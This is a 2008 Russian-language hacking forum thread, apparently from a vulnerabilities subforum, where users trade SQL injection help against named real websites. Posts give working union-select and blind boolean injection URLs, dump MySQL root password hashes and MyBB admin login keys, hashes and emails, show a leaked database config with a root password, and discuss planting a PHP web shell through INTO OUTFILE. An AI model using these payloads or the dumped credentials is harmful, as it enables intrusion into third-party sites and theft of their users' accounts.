Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    По-моему, ты ошибся. При всех запросах выводится одно и то же. Поищи скулю в "поиске" =)
    Code:
    111' union select 1,2,3,4,5 from email limit 950,1/*
    
     
    #2861 krypt3r, 8 Aug 2008
    Last edited: 8 Aug 2008
  2. xWhitex

    xWhitex New Member

    Joined:
    7 Aug 2008
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0
    Собствено такой вопрос Sql выдает пароль, и логин но в админку незаходит.
    вот пример:
    А вот сама админка:
    Собствено что можно зделать?
     
  3. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Возможно стоит блок по ай-пи. То есть в админку может заходить только с ай-пи 75.125.150.120 - к примеру.
     
  4. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    xWhitex: ну или (так как у меня с alvis.ru било) просто вход в админку иногда вирубивають =(
     
  5. WAR!9G

    WAR!9G Elder - Старейшина

    Joined:
    24 Jun 2007
    Messages:
    112
    Likes Received:
    89
    Reputations:
    1
    Эмм, ну вобщето ты получил пасс от самой базы данных, а не пасс от админки ;)
     
  6. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Здрастье =)
    у меня вопрос:
    +select+1,2,3,4,5,6,7,8,9/*
    Вот скуля,принтабельное поле - 7
    [​IMG]
    J\Очень интересно выводиться версия,можно ли вывести данные кроме version()???
    Заранее спасибо
     
  7. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    скорее всего нет,я думаю,там стоит ограничение по типу данных и по длине...

    а у меня такой вопрос:
    почему не проходит конструкция ?
    0x3c3f2073797374656d28245f4745545b27636d64275d293b203f3e - <? system($_GET['cmd']); ?>
    0x2f7661722f7777772f666f72756d2f7368656c6c2e706870 - установочная дирректория /var/www/forum/shell.php
     
    1 person likes this.
  8. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    В Into Outfile нельзя использовать Hex значения, только коквычки

    Гы гы, connect.php
    Code:
    <?
    $Host = "localhost";
    $User = "root";
    $Password = "123456";
    
    $Database_name = "forum";
    
    $Link = mysql_connect ($Host, $User, $Password) or die(mysql_error());
    		mysql_select_db($Database_name,$Link) or die(mysql_error());
    ?>
    
    Мощный пароль на рута :D
     
    #2868 Ponchik, 9 Aug 2008
    Last edited: 9 Aug 2008
  9. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.pixheaven.net/galerie.php?id=-5+union+select+1,2,3,4,5,6,version(),8,9+from+mysql.users/*
    повидимому вслепую видно что ето версия 4.1.x
    да и
    Code:
    SELECT command denied to user 'pixheavennet'@'10.0.85.212' for table 'users
    нет доступа на чтение..
     
    2 people like this.
  10. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Почему же четвертая? Если выводиться,что пятая?
    Увидишь,что принтабельно поле 7,а когда вводишь version() ,то активируется\загарается цифра ПЯДЬ :eek:
     
  11. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    кто поможет
    вот нашёл такую дыру кто скажет можно её дальше раскроить?
     
  12. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(concat(version(),char(58),user()))),6,7,8,9/*
    Кстати там ещё таблица users есть.
     
    1 person likes this.
  13. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    а ты введи вместо (7) цифру 3 и увидиш загоритсо цифра 3...
     
    4 people like this.
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    K1nD[e]R,DDoSька

    Версия 5 полей с выводом нет(в этом месте), цифра которая выводится(активируется) это не вывод, но её можно использовать как индикацию true

    Тоесть:

    http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=3
    цифра не активна false

    http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=4
    цифра не активна false

    http://www.pixheaven.net/galerie_us.php?id=3+and+substring(version(),1,1)=5
    цифра зажглась true

    Или ищи вывод в другом месте, или подзапросы
     
  15. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Вот мой не похек (((( помогите пожалуйстА!
    http://football.kapook.com/webboard_view_guest.php?qid='4595
    http://mrdriver.com/device.php?id=33714'
    http://driversdb.com/device.php?id=107971'
    2 последних..вообще как одинаковые...
     
    #2875 DDoSька, 10 Aug 2008
    Last edited: 10 Aug 2008
  16. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    K1nD[e]R, mysql.userS не существует. Есть mysql.user
     
  17. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    DDoSька

    http://football.kapook.com/team.php?id=13%27+union+select+1,2,3,4,5,6,7,concat(0x3a,user,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
    :root:612382396d951d43

    http://mrdriver.com/device.php?id=-33714%27+union+select+version()/*
    5.0.24-standard
    Не будем перебирать все таблицы и посмотрим на сайт.
    Стоит форум mybb пробуем табл mybb_users
    http://mrdriver.com/device.php?id=-33714%27+union+select+concat(uid,0x3a,loginkey,0x3a,password,0x3a,email,0x3a,icq)+from+mybb_users+limit+0,1/*

    1:sekysvwGmEE5uCfSHMKdK1uAUdrykTa6XkwLbNSnsxli1Q2D7h:24a1de6ebae6c9497fac8e1c328d8fa2:[email protected]:
    Всё зашифровал))) гад.


    http://driversdb.com/device.php?id=-107971%27+union+select+concat(uid,0x3a,loginkey,0x3a,password,0x3a,email,0x3a,icq)+from+mybb_users+limit+0,1/*

    1:7T6Jlse4WHMFWtJax9OsOVgLqmWoufnlzPDkCtHGFleS9YZmW4:e7cf5c7cf184622332e2bc347a38659a:[email protected]:
     
    #2877 tor4), 10 Aug 2008
    Last edited: 10 Aug 2008
    1 person likes this.
  18. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    можно попонятнее разъяснить где что я нуп))
     
  19. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    1 person likes this.
  20. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    Да уже всё репку накинул))
     
Thread Status:
Not open for further replies.